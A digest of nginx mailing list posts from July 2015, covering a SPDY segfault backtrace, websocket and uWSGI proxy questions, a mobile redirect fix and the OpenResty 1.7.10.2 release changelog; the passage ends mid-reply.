From nginx-forum at nginx.us Wed Jul 1 03:08:36 2015 From: nginx-forum at nginx.us (snagytx) Date: Tue, 30 Jun 2015 23:08:36 -0400 Subject: websocket causes "client sent invalid method ..." Message-ID: Hello, I'm trying setup nginx for socket proxy. I was able to find that nginx can be configured to proxy websockets and added an error log file in the server configuration block to isolate the messages, and I get: client sent invalid method while reading client request line, client: XX.XX.XX.1, server: , request: ?b??" in the access logs I see: XX.XX.XX.1 - - [30/Jun/2015:17:39:15 -0400] "\x00\x08\x1B\x19\x94\xD2\x81b\xBD\xF3" 400 172 "-" "-" "-" The software that is I need to proxy is a remote assistant application with a web servlet running inside tomcat and with two client applications, one admin and one user, that connect to the server and communicate. Is there anything that can be done to make it work? Thank you in advance. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260007,260007#msg-260007 From nginx-forum at nginx.us Wed Jul 1 11:28:59 2015 From: nginx-forum at nginx.us (kirimedia) Date: Wed, 01 Jul 2015 07:28:59 -0400 Subject: nginx-1.9.2 + ssl + spdy segfault Message-ID: <1ac0379611c5ea9e93fdbc3f8c20a634.NginxMailingListEnglish@forum.nginx.org> Segfault in nginx-1.9.2 with ssl and spdy module # nginx -V nginx version: nginx/1.9.2 built by gcc 4.4.6 20110731 (Red Hat 4.4.6-3) (GCC) built with OpenSSL 1.0.1e-fips 11 Feb 2013 TLS SNI support enabled configure arguments: --user=nginx --group=nginx --prefix=/usr/local/nginx --sbin-path=/usr/local/nginx/sbin/nginx --conf-path=/usr/local/nginx/conf/nginx.conf --with-http_ssl_module --with-http_gzip_static_module --with-http_stub_status_module --with-http_realip_module --with-debug --with-ipv6 --with-http_spdy_module --add-module=/home/buildbot/rpm//BUILD/lua-nginx-module-0.9.16 --add-module=/home/buildbot/rpm//BUILD/ngx_devel_kit-0.2.14 # gdb nginx nginx.core GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1) Copyright (C) 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-redhat-linux-gnu". For bug reporting instructions, please see: ... Reading symbols from /usr/local/nginx/sbin/nginx...done. [New Thread 24331] ... #0 ngx_http_spdy_close_stream_handler (ev=0x754eb58) at src/http/ngx_http_spdy.c:3353 3353 src/http/ngx_http_spdy.c: No such file or directory. in src/http/ngx_http_spdy.c Missing separate debuginfos, use: debuginfo-install nginx-rb-1.9.52-1.x86_64 (gdb) directory nginx-1.9.2 Source directories searched: nginx-1.9.2:$cdir:$cwd (gdb) bt #0 ngx_http_spdy_close_stream_handler (ev=0x754eb58) at src/http/ngx_http_spdy.c:3353 #1 0x0000000000482562 in ngx_http_spdy_write_handler (wev=) at src/http/ngx_http_spdy.c:649 #2 0x0000000000435f26 in ngx_event_process_posted (cycle=0xcc6a20, posted=0x76fcd0) at src/event/ngx_event_posted.c:33 #3 0x000000000043ce85 in ngx_worker_process_cycle (cycle=0xcc6a20, data=) at src/os/unix/ngx_process_cycle.c:769 #4 0x000000000043b234 in ngx_spawn_process (cycle=0xcc6a20, proc=0x43cdb0 , data=0x10, name=0x4f98b3 "worker process", respawn=-4) at src/os/unix/ngx_process.c:198 #5 0x000000000043c1cc in ngx_start_worker_processes (cycle=0xcc6a20, n=23, type=-4) at src/os/unix/ngx_process_cycle.c:358 #6 0x000000000043dbd8 in ngx_master_process_cycle (cycle=0xcc6a20) at src/os/unix/ngx_process_cycle.c:243 #7 0x000000000041b856 in main (argc=, argv=) at src/core/nginx.c:415 (gdb) list 3348 ngx_http_request_t *r; 3349 3350 fc = ev->data; 3351 r = fc->data; 3352 3353 ngx_log_debug0(NGX_LOG_DEBUG_HTTP, r->connection->log, 0, 3354 "spdy close stream handler"); 3355 3356 ngx_http_spdy_close_stream(r->spdy_stream, 0); 3357 } (gdb) p r $1 = (ngx_http_request_t *) 0x0 (gdb) p fc $2 = (ngx_connection_t *) 0x754ea20 (gdb) p *fc $3 = {data = 0x0, read = 0x754eaf8, write = 0x754eb58, fd = 1041, recv = 0x4424e0 , send = 0x441e90 , recv_chain = 0x442990 , send_chain = 0x484830 , listening = 0xcc6f00, sent = 16770, log = 0x754ebb8, pool = 0x1edb9a0, sockaddr = 0x1edb9f0, socklen = 16, addr_text = {len = 11, data = 0x1edba50 "83.149.9.264"}, proxy_protocol_addr = {len = 0, data = 0x0}, ssl = 0x53307b8, local_sockaddr = 0xe773e0, local_socklen = 16, buffer = 0x0, queue = { prev = 0x0, next = 0x0}, number = 68976568, requests = 7, buffered = 2, log_error = 2, unexpected_eof = 0, timedout = 0, error = 1, destroyed = 1, idle = 0, reusable = 0, close = 0, sendfile = 1, sndlowat = 1, tcp_nodelay = 2, tcp_nopush = 0, need_last_buf = 1} (gdb) p ev $4 = (ngx_event_t *) 0x754eb58 (gdb) p *ev $5 = {data = 0x754ea20, write = 1, accept = 0, instance = 0, active = 0, disabled = 0, ready = 1, oneshot = 0, complete = 0, eof = 0, error = 0, timedout = 0, timer_set = 0, delayed = 0, deferred_accept = 0, pending_eof = 0, posted = 0, closed = 0, channel = 0, resolver = 0, cancelable = 0, available = 0, handler = 0x47ed90 , index = 0, log = 0x754ebb8, timer = {key = 0, left = 0x0, right = 0x0, parent = 0x0, color = 0 '\000', data = 0 '\000'}, queue = {prev = 0x0, next = 0x0}} (gdb) f 1 #1 0x0000000000482562 in ngx_http_spdy_write_handler (wev=) at src/http/ngx_http_spdy.c:649 649 wev->handler(wev); (gdb) list 644 645 ngx_log_debug1(NGX_LOG_DEBUG_HTTP, c->log, 0, 646 "run spdy stream %ui", stream->id); 647 648 wev = stream->request->connection->write; 649 wev->handler(wev); 650 } 651 652 sc->blocked = 0; 653 (gdb) p wev $6 = (gdb) p stream $7 = (ngx_http_spdy_stream_t *) 0x66a7150 (gdb) p *stream $8 = {id = 13, request = 0x66a64c0, connection = 0x39861e0, index = 0x0, header_buffers = 0, queued = 0, send_window = 40500, recv_window = 2147483647, free_frames = 0x10ec518, free_data_headers = 0x10ec558, free_bufs = 0x10ec4b8, queue = {prev = 0x0, next = 0x0}, priority = 4, handled = 0, blocked = 0, exhausted = 0, in_closed = 1, out_closed = 1, skip_data = 1} (gdb) p stream->request $9 = (ngx_http_request_t *) 0x66a64c0 (gdb) p *stream->request $10 = {signature = 1347703880, connection = 0x754ea20, ctx = 0x66a6df8, main_conf = 0xcc76e0, srv_conf = 0xd2a178, loc_conf = 0xd3a0c0, read_event_handler = 0x454ee0 , write_event_handler = 0x4521f0 , cache = 0x0, upstream = 0x0, upstream_states = 0x0, pool = 0x0, header_in = 0x66a7100, headers_in = {headers = {last = 0x66a6530, part = {elts = 0x10ebb50, nelts = 5, next = 0x0}, size = 48, nalloc = 20, pool = 0x66a6470}, host = 0x10ebb50, connection = 0x0, if_modified_since = 0x0, if_unmodified_since = 0x0, if_match = 0x0, if_none_match = 0x0, user_agent = 0x10ebc10, referer = 0x0, content_length = 0x0, content_type = 0x0, range = 0x0, if_range = 0x0, transfer_encoding = 0x0, expect = 0x0, upgrade = 0x0, accept_encoding = 0x10ebbb0, via = 0x0, authorization = 0x0, keep_alive = 0x0, x_forwarded_for = {elts = 0x0, nelts = 0, size = 0, nalloc = 0, pool = 0x0}, x_real_ip = 0x0, user = {len = 0, data = 0x0}, passwd = {len = 0, data = 0x0}, cookies = {elts = 0x66a71c0, nelts = 0, size = 8, nalloc = 2, pool = 0x66a6470}, server = {len = 11, data = 0x10eb761 "r.mradx.net"}, content_length_n = -1, keep_alive_n = -1, connection_type = 1, chunked = 0, msie = 0, msie6 = 0, opera = 0, gecko = 0, chrome = 0, safari = 0, konqueror = 0}, headers_out = {headers = {last = 0x66a66a0, part = {elts = 0x66a6a38, nelts = 4, next = 0x0}, size = 48, nalloc = 20, pool = 0x66a6470}, status = 200, status_line = {len = 0, data = 0x0}, server = 0x0, date = 0x0, content_length = 0x0, content_encoding = 0x0, location = 0x0, refresh = 0x0, last_modified = 0x0, content_range = 0x0, accept_ranges = 0x66a6ac8, www_authenticate = 0x0, expires = 0x66a6a68, etag = 0x66a6a38, override_charset = 0x0, content_type_len = 10, content_type = {len = 10, data = 0xd84f60 "image/jpeg"}, charset = {len = 0, data = 0x0}, content_type_lowcase = 0x0, content_type_hash = 0, cache_control = {elts = 0x66a7468, nelts = 1, size = 8, nalloc = 1, pool = 0x66a6470}, content_length_n = 25036, date_time = 0, last_modified_time = 1434536173}, request_body = 0x0, lingering_time = 0, start_sec = 1435303301, start_msec = 143, method = 2, http_version = 1001, request_line = {len = 0, data = 0x66a71d0 "GET /img/BA/1F3F84.jpg HTTP/1.1"}, uri = {len = 18, data = 0x10eb78b "/img/BA/1F3F84.jpg"}, args = {len = 0, data = 0x0}, exten = {len = 3, data = 0x10eb79a "jpg"}, unparsed_uri = {len = 18, data = 0x10eb78b "/img/BA/1F3F84.jpg"}, method_name = {len = 3, data = 0x66a71d0 "GET /img/BA/1F3F84.jpg HTTP/1.1"}, http_protocol = {len = 8, data = 0x10eb7c1 "HTTP/1.1"}, out = 0x0, main = 0x66a64c0, parent = 0x0, postponed = 0x0, post_subrequest = 0x0, posted_requests = 0x0, phase_handler = 18, content_handler = 0, access_code = 0, variables = 0x66a6fa0, ncaptures = 0, captures = 0x66a71f0, captures_data = 0x0, limit_rate = 0, limit_rate_after = 0, header_size = 386, request_length = 301, err_status = 0, http_connection = 0x5330770, spdy_stream = 0x66a7150, log_handler = 0x452510 , cleanup = 0x0, subrequests = 201, count = 0, blocked = 0, aio = 0, http_state = 6, complex_uri = 0, quoted_uri = 0, plus_in_uri = 0, space_in_uri = 0, invalid_header = 0, add_uri_to_alias = 0, valid_location = 1, valid_unparsed_uri = 1, uri_changed = 0, uri_changes = 11, request_body_in_single_buf = 0, request_body_in_file_only = 0, request_body_in_persistent_file = 0, request_body_in_clean_file = 0, request_body_file_group_access = 0, request_body_file_log_level = 5, request_body_no_buffering = 0, subrequest_in_memory = 0, waited = 0, cached = 0, gzip_tested = 0, gzip_ok = 0, gzip_vary = 0, proxy = 0, bypass_cache = 0, no_cache = 0, limit_conn_set = 0, limit_req_set = 0, pipeline = 0, chunked = 0, header_only = 0, keepalive = 0, lingering_close = 0, discard_body = 0, reading_body = 0, internal = 0, error_page = 0, filter_finalize = 0, post_action = 0, request_complete = 0, request_output = 1, header_sent = 1, expect_tested = 0, root_tested = 1, done = 0, logged = 0, buffered = 0, main_filter_need_in_memory = 1, filter_need_in_memory = 0, filter_need_temporary = 0, allow_ranges = 1, single_range = 0, disable_not_modified = 0, stat_reading = 0, stat_writing = 1, state = 0, header_hash = 3194399592611459, lowcase_index = 18446744073709551615, lowcase_header = '\000' , header_name_start = 0x10eb81b "user-agent", header_name_end = 0x10eb825 "", header_start = 0x10eb829 "CFNetwork/711.3.18 Darwin/14.0.0", header_end = 0x10eb861 "", uri_start = 0x66a64c0 "HTTP", uri_end = 0x0, uri_ext = 0x10eb79a "jpg", args_start = 0x0, request_start = 0x0, request_end = 0x0, method_end = 0x0, schema_start = 0x10eb7ac "https", schema_end = 0x10eb7b1 "", host_start = 0x0, host_end = 0x0, port_start = 0x0, port_end = 0x0, http_minor = 1, http_major = 1, content_start_sec = 0, content_start_msec = 0, content_end_sec = 0, content_end_msec = 0, gzip_process = 0, gzip_start_sec = 0, gzip_start_msec = 0, gzip_end_sec = 0, gzip_end_msec = 0} (gdb) p stream->request->connection $11 = (ngx_connection_t *) 0x754ea20 (gdb) p *stream->request->connection $12 = {data = 0x0, read = 0x754eaf8, write = 0x754eb58, fd = 1041, recv = 0x4424e0 , send = 0x441e90 , recv_chain = 0x442990 , send_chain = 0x484830 , listening = 0xcc6f00, sent = 16770, log = 0x754ebb8, pool = 0x1edb9a0, sockaddr = 0x1edb9f0, socklen = 16, addr_text = {len = 11, data = 0x1edba50 "83.149.9.264"}, proxy_protocol_addr = {len = 0, data = 0x0}, ssl = 0x53307b8, local_sockaddr = 0xe773e0, local_socklen = 16, buffer = 0x0, queue = { prev = 0x0, next = 0x0}, number = 68976568, requests = 7, buffered = 2, log_error = 2, unexpected_eof = 0, timedout = 0, error = 1, destroyed = 1, idle = 0, reusable = 0, close = 0, sendfile = 1, sndlowat = 1, tcp_nodelay = 2, tcp_nopush = 0, need_last_buf = 1} (gdb) p stream->request->connection->write $13 = (ngx_event_t *) 0x754eb58 (gdb) p *stream->request->connection->write $14 = {data = 0x754ea20, write = 1, accept = 0, instance = 0, active = 0, disabled = 0, ready = 1, oneshot = 0, complete = 0, eof = 0, error = 0, timedout = 0, timer_set = 0, delayed = 0, deferred_accept = 0, pending_eof = 0, posted = 0, closed = 0, channel = 0, resolver = 0, cancelable = 0, available = 0, handler = 0x47ed90 , index = 0, log = 0x754ebb8, timer = {key = 0, left = 0x0, right = 0x0, parent = 0x0, color = 0 '\000', data = 0 '\000'}, queue = {prev = 0x0, next = 0x0}} (gdb) Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260010,260010#msg-260010 From arut at nginx.com Thu Jul 2 07:52:51 2015 From: arut at nginx.com (Roman Arutyunyan) Date: Thu, 2 Jul 2015 10:52:51 +0300 Subject: Small bug in src/stream/ngx_stream_proxy_module.c In-Reply-To: <4afa7aa7beae7fd58fec794f011b7c93.NginxMailingListEnglish@forum.nginx.org> References: <4afa7aa7beae7fd58fec794f011b7c93.NginxMailingListEnglish@forum.nginx.org> Message-ID: Thanks, we?re planning to commit the fix. Could you say your name so we could add it to the commit message? > On 30 Jun 2015, at 15:38, itpp2012 wrote: > > Roman Arutyunyan Wrote: > ------------------------------------------------------- >>> On 30 Jun 2015, at 15:01, itpp2012 wrote: >>> >>> Roman Arutyunyan Wrote: >>> ------------------------------------------------------- >>>> What compiler do you have? >>> >>> A proper one :) vc++ >> >> version? > > 2010, 2013, 2015, all the same. > > Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259969,259993#msg-259993 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- Roman Arutyunyan From nginx-forum at nginx.us Thu Jul 2 08:36:37 2015 From: nginx-forum at nginx.us (itpp2012) Date: Thu, 02 Jul 2015 04:36:37 -0400 Subject: Small bug in src/stream/ngx_stream_proxy_module.c In-Reply-To: References: Message-ID: Roman Arutyunyan Wrote: ------------------------------------------------------- > Thanks, we?re planning to commit the fix. > > Could you say your name so we could add it to the commit message? Just stick to itpp2012, everyone knows by now we produce nginx for Windows based on the Linux version, the code base is not too different. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259969,260015#msg-260015 From nginx-forum at nginx.us Thu Jul 2 08:48:35 2015 From: nginx-forum at nginx.us (yangcl) Date: Thu, 02 Jul 2015 04:48:35 -0400 Subject: resolver for upstream In-Reply-To: <00e47f88559985c574d367a526fef7c4.NginxMailingListEnglish@forum.nginx.org> References: <00e47f88559985c574d367a526fef7c4.NginxMailingListEnglish@forum.nginx.org> Message-ID: <2f4f60f41141f91552d7a9f7c750405b.NginxMailingListEnglish@forum.nginx.org> I have encountered such a problem Posted at Nginx Forum: http://forum.nginx.org/read.php?2,251138,260017#msg-260017 From shahzaib.cb at gmail.com Thu Jul 2 15:11:48 2015 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Thu, 2 Jul 2015 20:11:48 +0500 Subject: Nginx support fot Weedfs !! In-Reply-To: References: Message-ID: Guys any advice ? On Thu, Jun 25, 2015 at 4:17 AM, shahzaib shahzaib wrote: > Hi, > > We're deploying WeedFS distributed filesystem for thumbs storage and > scalabilty. Weedfs is composed of two layers (Master, Volume). Master > server does all metadata mapping to track the corresponding volume server > against user requested file whereas volume server is the actual storage to > serve those requested files back to user via HTTP. Currently, weedfs > default webserver is being used as HTTP but it would be better to have > nginx webserver on volume servers for its low foot prints, stability and > robust response time for static .jpg files. > > So we need to know if we can use nginx with weedFS ? Following is the > github we found, but need to confirm if it will fulfill our needs ? > > https://github.com/medcl/lua-resty-weedfs > > Thanks in advance. > > Regards. > Shahzaib > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 3 04:45:05 2015 From: nginx-forum at nginx.us (ajjH6) Date: Fri, 03 Jul 2015 00:45:05 -0400 Subject: uWSGI - upstream prematurely closed connection while reading response header from upstream In-Reply-To: <452c44c7dcdac9c27c0d31af3688fdb9.NginxMailingListEnglish@forum.nginx.org> References: <452c44c7dcdac9c27c0d31af3688fdb9.NginxMailingListEnglish@forum.nginx.org> Message-ID: <83636fb27e998bba4096b035adf1a3f1.NginxMailingListEnglish@forum.nginx.org> Any ideas? I just want to run a uWSGI app for more than 60 seconds? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,259882,260022#msg-260022 From agentzh at gmail.com Fri Jul 3 09:49:41 2015 From: agentzh at gmail.com (Yichun Zhang (agentzh)) Date: Fri, 3 Jul 2015 17:49:41 +0800 Subject: [ANN] OpenResty 1.7.10.2 released Message-ID: Hi folks! I am pleased to announce the new formal release, 1.7.10.2, of the OpenResty bundle: https://openresty.org/#Download We include a lot of fixes and new features accumulated in the last few months. Special thanks go to all our contributors and users for making this happen! Below is the complete change log for this release, as compared to the last formal release (1.7.10.1): * bugfix: ./configure: fixed the "--without-http_rewrite_module" option by disabling the ngx_devel_kit (NDK) module automatically; also automatically disable the the ngx_encrypted_session module when the ngx_devel_kit (NDK) module is disabled. * bugfix: ./configure: removed hacks to work around an old bug in the ngx_lua module's build system (just recently fixed in the ngx_lua module). * bugfix: LuaJIT compilation might fail when old gcc 4 compilers are used (like gcc 4.1.0). this regression had appeared in OpenResty 1.7.7.2. thanks aseiot for the report. * upgraded resty-cli to 0.03. * bugfix: resty: command-line options did not pass to the user Lua script unless "--" was intentionally specified. now standalone Lua scripts with a shebang line work out of the box (if LuaJIT is used, which is the default). thanks neomantra for the report. * bugfix: resty: now sends "error_log" to "stderr" instead of the system-specific path "/dev/stderr". thanks Evan Wies for the patch. * doc: added the new section "Test Suite" as per Enrique Garcia's request. * tests: fixed test failures on Mac OS X. thanks Enrique Garc?a for the report. * upgraded the ngx_lua module to 0.9.16. * feature: ngx.encode_base64(): added support for the "no_padding" boolean argument to disable padding when a true value is specified. thanks Shuxin Yang for the patch. * feature: fixed compilation failures with nginx 1.9.0. thanks Charles R. Portwood II for the original patch. * feature: removed the dead code for the old "NGX_THREADS" mode which breaks the new nginx (1.7.11+) with thread pool support. thanks Tatsuhiko Kubo for the patch. * bugfix: use of "ngx_http_image_filter_module" might lead to request hang due to duplicate header filter invocations. thanks Antony Dovgal for the report. * bugfix: we should never automatically set "Content-Type" on 304 responses. thanks Simon Eskildsen for the patch. * bugfix: raw downstream cosockets did not support full-deplexing. thanks aviramc for the bug report and the original patch. * bugfix: we did not always discard the request body if the user Lua handlers didn't, which might cause 400 error pages for keep-alive or pipelined requests. thanks Shuxin Yang for the original patch. * bugfix: ngx.resp.get_headers(): some built-in headers were not accessible via lowercase. thanks Nick Muerdter for the patch. * bugfix: we might still pick up Lua/LuaJIT headers/libraries in the paths specified by nginx ./configure's "--with-cc-opt=OPTS" and "--with-ld-opt=OPTS" optons even when the LUAJIT_INC LUAJIT_LIB or LUA_INC LUA_LIB environments are explicitly specified. * bugfix: config: we might miss the linker option "-ldl" when we shouldn't. this might lead to build failures. * bugfix: access nonexistent fields in the "ngx" table in init_by_lua* could lead to the exception "no request object found" because of the overreacting "__index" metamethod of the "ngx" table. * bugfix: fixed compilation failures with very old versions of PCRE, like 4.5. * doc: fixed a bug in an example where both rewrite_by_lua and content_by_lua produce response outputs. thanks fengidri for the report. * doc: fixed the context for the lua_need_request_body directive. thanks Tatsuhiko Kubo for the patch. * doc: fixed the code sample for ngx.redirect() to reflect recent changes there. thanks Zi Lin for the report. * doc: added a note on possible uninitialized variables for short-circuited requests. thanks Simon Eskildsen for the patch. * tests: fixed nondeterminism due to unordered Lua table iterations. thanks Markus Linnala for the patch. * upgraded the ngx_headers_more module to 0.26. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * optimize: removed the unused C function "ngx_http_headers_more_rm_header". thanks Markus Linnala for the catch. * doc: made it clear that more_set_headers always override existing headers with the same name. * upgraded the ngx_set_misc module to 0.29. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * tests: add openssl hmac defensive test. thanks Markus Linnala for the patch. * upgraded the ngx_lua_upstream module to 0.03. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * doc: README.md: fixed the get_backup_peers example. thanks Jakub Kramarz for the patch. * upgraded the ngx_srcache module to 0.30. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * upgraded the ngx_drizzle module to 0.1.9. * feature: fixed compilation errors with nginx 1.9.1+. * feature: automatic libdrizzle path discovery for Ubuntu 12.04. thanks Mathew Heard for the patch. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * upgraded the ngx_postgres module to 1.0rc6. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * bugfix: use "ngx_abs()" instead of "abs()" to fix one clang warning ("-Wabsolute-value"). * upgraded the ngx_rds_csv module to 0.06. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * bugfix: fixed two clang "-Wconditional-uninitialized" warnings. * doc: improved the documentation a lot. * upgraded the ngx_rds_json module to 0.14. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * doc: improved the documentation a lot. * upgraded the ngx_echo module to 0.58. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * bugfix: we no longer break on subrequests when the "ngx_http_ssi_module" is diasbled. thanks Anthony Ryan for the patch. * bugfix: use of "ngx_http_image_filter_module" might lead to request hang due to duplicate header filter invocations. * upgraded the ngx_memc module to 0.16. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * bugfix: fixed clang warnings on "unused variables" in the Ragel generated source. * upgraded the ngx_redis2 module to 0.12. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * bugfix: fixed clang warnings on "unused variables" in the Ragel generated source. * bugfix: always set the response status code in case of bad statuses like 504. thanks Kaito Sys for the report. * doc: typo fixes from Karan Chaudhary. * upgraded the ngx_encrypted_session module to 0.04. * feature: added debugging logs for expiration times during encryption and decription. also adjusted other debug logging messages a bit. thanks Kalpesh Patel for requesting this. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * bugfix: fixed warnings from the Microsoft C/C++ compiler. thanks Edwin Cleton for the report. * doc: improved the documentation a lot. * upgraded the ngx_iconv module to 0.11. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * upgraded the ngx_array_var module to 0.04. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * doc: improved the documentation a lot. * upgraded the ngx_xss module to 0.05. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * bugfix: fixed clang warnings on "unused variables" in the Ragel generated source. * doc: improved the documentation a lot. * upgraded the ngx_form_input module to 0.11. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * upgraded the ngx_coolkit module to 0.2rc3. * feature: fixed compilation failures with nginx 1.7.11+ configured with "--with-threads". * upgraded LuaJIT to v2.1-20150622: https://github.com/openresty/luajit2/tags * imported Mike Pall's latest changes: * Add Xbox One port. * Fix narrowing of TOBIT. * x64: Allow building without external unwinder. * x86/x64: Fix argument check for bit shifts. * x64: Add LJ_GC64 mode interpreter. Enable this mode with: make "XCFLAGS=-DLUAJIT_ENABLE_GC64" * Disable trace stitching (for now) due to a design mistake. * Fix stack check in narrowing optimization. * ARM64: Fix math.floor/math.ceil for string args. * DynASM/PPC: Add sub/shift/rotate/clear instruction aliases. * DynASM/PPC: Add support for parameterized shifts/masks. * PPC: Fix cross-endian builds. * PPC: Fix write barrier in BC_TSETR. * Fix Lua/C API typecheck error for special indexes. * FFI: Fix FOLD rule for TOBIT + CONV num.u32. * ARM: Handle more arch defines. * Properly fail unsupported cross-compile to MIPS64. The HTML version of the change log with lots of helpful hyper-links can be browsed here: http://openresty.org/#ChangeLog1007010 The next formal release of OpenResty will be based on the new Nginx 1.9.x core. OpenResty (aka. ngx_openresty) is a full-fledged web application server by bundling the standard Nginx core, Lua/LuaJIT, lots of 3rd-party Nginx modules and Lua libraries, as well as most of their external dependencies. See OpenResty's homepage for details: http://openresty.org/ We have run extensive testing on our Amazon EC2 test cluster and ensured that all the components (including the Nginx core) play well together. The latest test report can always be found here: http://qa.openresty.org Have fun! Best regards, -agentzh From nginx-forum at nginx.us Fri Jul 3 11:04:20 2015 From: nginx-forum at nginx.us (ramsoft75) Date: Fri, 03 Jul 2015 07:04:20 -0400 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad Message-ID: <676857aa61b897bbc97b69822bad4451.NginxMailingListEnglish@forum.nginx.org> The problem is, the site is entered with www in url in a mobile device with parameters in the url, it is redirected from www.domain.com to m.domain.com but the parameters entered with www.domain.com/parameters when redirected to m.domain.com doesn't receive the parameters from thr url origin in www. In conclusion www.domain.com/parameters should redirect to m.domain.com/parameters but is redirected to m.domain.com, the parameters are clean. Is there a way no to clean it ? The www config is the following : server { listen 80; server_name www.domain.com; ... #to detect if the device with www entered in domain is mobile if ($http_user_agent ~* '(iPhone|iPod|iPad|Android|BlackBerry|webOS|Windows Phone)') { rewrite ^ http://m.domain.com$uri; } } The mobile configuration is server { listen 80; server_name m.domain.com; ... } Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260033,260033#msg-260033 From ryd994 at 163.com Fri Jul 3 17:06:47 2015 From: ryd994 at 163.com (ryd994) Date: Fri, 03 Jul 2015 17:06:47 +0000 Subject: uWSGI - upstream prematurely closed connection while reading response header from upstream In-Reply-To: <83636fb27e998bba4096b035adf1a3f1.NginxMailingListEnglish@forum.nginx.org> References: <452c44c7dcdac9c27c0d31af3688fdb9.NginxMailingListEnglish@forum.nginx.org> <83636fb27e998bba4096b035adf1a3f1.NginxMailingListEnglish@forum.nginx.org> Message-ID: It sounds like uwsgi setting problem. Prematurely closed connection means Nginx is not expecting that. On Fri, Jul 3, 2015, 00:45 ajjH6 wrote: > Any ideas? I just want to run a uWSGI app for more than 60 seconds? > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,259882,260022#msg-260022 > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Fri Jul 3 17:47:30 2015 From: francis at daoine.org (Francis Daly) Date: Fri, 3 Jul 2015 18:47:30 +0100 Subject: Nginx doesn't redirect www no m in Safari, iPhone, iPad In-Reply-To: <676857aa61b897bbc97b69822bad4451.NginxMailingListEnglish@forum.nginx.org> References: <676857aa61b897bbc97b69822bad4451.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150703174730.GP23844@daoine.org> On Fri, Jul 03, 2015 at 07:04:20AM -0400, ramsoft75 wrote: Hi there, > In conclusion www.domain.com/parameters should redirect to > m.domain.com/parameters but is redirected to m.domain.com, the parameters > are clean. Is there a way no to clean it ? It works for me as-is. I add your "if" at server{} level, and I see: curl -A iPad -i http://localhost/parameters?key=value HTTP/1.1 302 Moved Temporarily ... Location: http://m.domain.com/parameters?key=value What response do you get for a similar curl command? f -- Francis Daly francis at daoine.org From mdounin at mdounin.ru Sat Jul 4 05:12:12 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Sat, 4 Jul 2015 08:12:12 +0300 Subject: nginx-1.9.2 + ssl + spdy segfault In-Reply-To: <1ac0379611c5ea9e93fdbc3f8c20a634.NginxMailingListEnglish@forum.nginx.org> References: <1ac0379611c5ea9e93fdbc3f8c20a634.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150704051211.GC74913@mdounin.ru> Hello! On Wed, Jul 01, 2015 at 07:28:59AM -0400, kirimedia wrote: > Segfault in nginx-1.9.2 with ssl and spdy module > > # nginx -V > nginx version: nginx/1.9.2 > built by gcc 4.4.6 20110731 (Red Hat 4.4.6-3) (GCC) > built with OpenSSL 1.0.1e-fips 11 Feb 2013 > TLS SNI support enabled > configure arguments: --user=nginx --group=nginx --prefix=/usr/local/nginx > --sbin-path=/usr/local/nginx/sbin/nginx > --conf-path=/usr/local/nginx/conf/nginx.conf --with-http_ssl_module > --with-http_gzip_static_module --with-http_stub_status_module > --with-http_realip_module --with-debug --with-ipv6 --with-http_spdy_module > --add-module=/home/buildbot/rpm//BUILD/lua-nginx-module-0.9.16 > --add-module=/home/buildbot/rpm//BUILD/ngx_devel_kit-0.2.14 As already suggested on the Russian mailing list, please try without 3rd party modules. (Note well that cross-posting isn't really a good idea.) [...] -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Sat Jul 4 05:20:33 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Sat, 4 Jul 2015 08:20:33 +0300 Subject: websocket causes "client sent invalid method ..." In-Reply-To: References: Message-ID: <20150704052033.GD74913@mdounin.ru> Hello! On Tue, Jun 30, 2015 at 11:08:36PM -0400, snagytx wrote: > Hello, > > I'm trying setup nginx for socket proxy. I was able to find that nginx can > be configured to proxy websockets and added an error log file in the server > configuration block to isolate the messages, and I get: > > client sent invalid method while reading client request line, client: > XX.XX.XX.1, server: , request: ?b??" > > in the access logs I see: > > XX.XX.XX.1 - - [30/Jun/2015:17:39:15 -0400] > "\x00\x08\x1B\x19\x94\xD2\x81b\xBD\xF3" 400 172 "-" "-" "-" > > The software that is I need to proxy is a remote assistant application with > a web servlet running inside tomcat and with two client applications, one > admin and one user, that connect to the server and communicate. > > Is there anything that can be done to make it work? The "websocket proxy" is something completely different from what you are looking for. It's to proxy the Websocket protocol connections - that is, to proxy HTTP/1.1 